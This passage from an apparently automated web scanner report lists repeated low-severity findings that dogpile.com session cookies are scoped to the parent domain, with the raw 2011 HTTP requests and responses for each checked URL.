<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/Dark%20Sites/1/302360/RightNav/Relevance/iq=true/zoom=off/qlnk=1/
...[SNIP]...

6.45. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:52 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301678093005; wsRecent=site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=8a9366cfe41848d795bec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=c1a8f04152fd49d4bbd5c16a3af0cb01&ActionId=afded22df52249fea4b3c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/Review%20Sites/1/302357/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=147d5eeccb2149eaadeec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=c1a8f04152fd49d4bbd5c16a3af0cb01&ActionId=afded22df52249fea4b3c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:13 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:13 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:13 GMT
Connection: close
Content-Length: 262

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/Review%20Sites/1/302357/RightNav/Relevance/iq=true/zoom=off/qlnk=
...[SNIP]...

6.46. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:16 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=eae10ac2cab145b8a2c3c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:00 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:00 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:59 GMT
Connection: close
Content-Length: 261

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1
...[SNIP]...

6.47. http://www.dogpile.com/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/horoscope/1/4400/quickstart-6/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=f7359c30922a46e889b5c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:59 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:59 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:59 GMT
Connection: close
Content-Length: 259

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/horoscope/1/4400/quickstart-6/Relevance/iq=true/zoom=off/qlnk=1/_
...[SNIP]...

6.48. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8ae6cde94044449ca746c16a3af0cb01&ActionId=8e3deae18a0e4ecc8d67c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:19 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:19 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:19 GMT; path=/
Set-Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678119866; path=/
Set-Cookie: wsRecent=Submit+Site,Web,Relevance,&Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:19 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 159318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.49. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/termsofuse/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/termsofuse/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=995f53cbbb4c4da7993ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:23 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:23 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:22 GMT
Connection: close
Content-Length: 55891
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.50. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/tips/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/tips/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6172a79eb9f246e79ad9c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:30 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:30 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:30 GMT
Connection: close
Content-Length: 43940
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.51. http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_prefer/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_prefer/ws/redir/_iceUrlFlag=11?_IceUrl=true&qkw={searchTerms} HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_prefer/ws/results/Web/%7BsearchTerms%7D/1/0/0/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=a9902889eb724bb4a6c8c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:51 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:50 GMT
Connection: close
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_prefer/ws/results/Web/%7BsearchTerms%7D/1/0/0/Relevance/iq=true/zoom=off/_iceUrlFlag=7
...[SNIP]...

6.52. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/web/GE+Zero+Taxes

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/web/GE+Zero+Taxes HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Redirect
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.dogpile.com/dogpile_other/ws/index
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:05 GMT
Connection: close
Content-Length: 168

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.dogpile.com/dogpile_other/ws/index">here</a></body>

6.53. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/web/Go+Daddy+CEO+Elephant

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=af5ad2b55c194ed28a4dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:58 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:58 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:58 GMT; path=/
Set-Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301676971532; path=/
Set-Cookie: wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:55:58 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 162043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.54. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/web/MLB+Schedule

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/web/MLB+Schedule HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:02 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:02 GMT; path=/
Set-Cookie: wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; path=/
Set-Cookie: wsRecent=MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:03 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 147703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.55. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/about/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=ca6e8004e2754a219792c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:42 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:41 GMT
Connection: close
Content-Length: 45251
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.56. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/aboutresults/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/aboutresults/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
